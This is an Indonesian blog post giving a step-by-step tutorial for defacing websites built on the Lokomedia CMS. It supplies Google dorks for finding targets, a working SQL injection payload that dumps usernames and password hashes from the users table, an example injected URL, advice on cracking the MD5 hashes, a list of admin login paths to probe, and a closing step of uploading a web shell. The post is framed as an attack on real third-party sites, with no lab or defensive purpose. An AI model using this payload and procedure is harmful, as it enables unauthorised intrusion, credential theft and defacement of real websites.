Deface poc Sql lokomedia

 Hasil gambar untuk gambar anime keren terbaru



 Ok,,,,,
Kali ini saya akan memberikan tutorial deface poc
Sql Lokomedia Karya ana bangsa

ok langsung simak aja ya

========================================================================
Dork:
- inurl://statis-2
- inurl://statis-3
- inurl://statis-3-prifil.html

Lainnya kalian kreasikan sendiri
========================================================================
Exploit:
  'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
========================================================================
MD5 decryptor atau password hash
 Disini
========================================================================
script deface dan shell
Kalian bisa melihat nya di tutorial sebelumnya_^
Untuk mini shell kalian bisa melihat nya di
===>>Sini
Dan kreasi lainnya di
===>>Touch me
========================================================================
Tutorial Deface nya :

 1. pertama dorking dulu seperti biasa dengan dork yang saya sudah sediain

2. selanjutnya pilih target, terserah kalian mau pilih yang mana saya saranin sh yang vuln.

3. setelah itu langsung kita exploit dengan exploit di atas.
 contoh :
 http://site.co.li/statis-3'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

note : yang warna merah itu exploitnya.

4. jika berhasil tampilanya akan seperti ini :

5. setelah itu klik CTRL+U, dan ambil akun adminnya di situ, biasanya paswordny terenkripsi makannya kita siapin pasword crackernya.




6. copy code md5 tersebut, kemudian pastekan di md5 decrypter yang sudah saya sediakan di atas.

7. setelah kita mendapakan username dan paswordnya, sekarang tinggal kita mencari login adminya.
    kalian bisa gunakan tool admin finder koleksi kalian atau kalo gak puny yah cari pake manual, biasanya sh di :

http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator.asp
http://target.co.li/redaktur
http://target.co.li/admin_login
http://target.co.li/user_login
http://target.co.li/administrator.php

selebihnya pikirin sendiri.
atau bisa memakai admin finder

8. stelah kalian masuk barulah kalian upload shell kesayangan kalian. caranya? gunakan otak kalian kemaren udah saya kasih beberapa tutorial deface pasti kalian udah pada fahamkan?.

baiklah cukup sekian dulu tutorial dari saya semoga bermanfaat, kalo kagak yh manfaatin ajah kalo masih belum paham yh nanti saya buat video tutorialnya. selamat belajar dan sampai jumpa di tutorial berikutnya..

Jangan lupa like,kunjungi dan pasti share

Gambar di ambil dari= http://www.fhxtutorial.com


Komentar

Posting Komentar